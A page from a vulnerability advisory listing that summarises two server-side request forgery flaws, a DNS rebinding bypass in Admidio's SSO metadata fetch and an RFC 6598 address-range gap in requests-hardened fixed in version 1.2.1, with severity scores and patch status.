NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

DNS rebinding in Admidio's SSO metadata fetch endpoint bypasses SSRF protections by validating a hostname's IP address with gethostbyname() but passing the original hostname to curl_init(), allowing attackers to redirect requests to internal services including cloud metadata endpoints. Authenticated administrators can exploit this TOCTOU window between DNS resolution check and cURL connection to access internal IP ranges, read instance metadata, or scan internal networks.

Python SSRF PHP
NVD GitHub
EPSS 0% CVSS 6.5
MEDIUM PATCH This Month

Server-side request forgery in requests-hardened prior to 1.2.1 allows remote attackers to bypass SSRF protection and access internal services within RFC 6598 Shared Address Space (100.64.0.0/10) by supplying arbitrary URLs, particularly impacting AWS EKS deployments where this CIDR is the default pod network. The vulnerability has a CVSS score of 6.5 and is environment-dependent, affecting only deployments using the vulnerable IP range for internal networking. Vendor-released patch: version 1.2.1 extends IP filtering logic to block RFC 6598, 6to4 relay anycast, IPv6 reserved ranges, and multicast addresses.

Python SSRF
NVD GitHub
Prev Page 6 of 25 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy